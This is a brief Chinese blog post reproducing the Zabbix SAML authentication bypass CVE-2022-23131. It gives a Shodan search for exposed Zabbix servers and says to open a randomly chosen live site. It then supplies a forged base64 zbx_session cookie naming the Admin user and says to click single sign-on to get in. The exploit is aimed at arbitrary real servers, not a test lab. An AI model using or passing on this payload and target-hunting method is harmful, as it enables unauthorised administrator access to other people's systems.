cve-2022-23131-zabbix漏洞复现
摘要:最近发现一个最新出的漏洞,闲来无事复现一下
发现漏洞
第一步:
首先在shodan上面搜索title:zabbix http.html:"2021" http.html:"SAML",发现具有漏洞的zabbix程序
第二步:
随机抽取一个网站打开
第三步:
使用EditThisCookie插件,修改cookie中zbx_session(如果没有zbx_session这一项基本没有漏洞)项的值为
eyJzYW1sX2RhdGEiOnsidXNlcm5hbWVfYXR0cmlidXRlIjoiQWRtaW4ifSwic2Vzc2lvbmlkIjoiIiwic2lnbiI6IiJ9
第四步:
修改完cookie后,点击Sign in with Single-On
出现下列截图所示内容,说明无漏洞
出现下列截图所示内容,说明有漏洞
参考链接
本作品采用 知识共享署名-相同方式共享 4.0 国际许可协议 进行许可。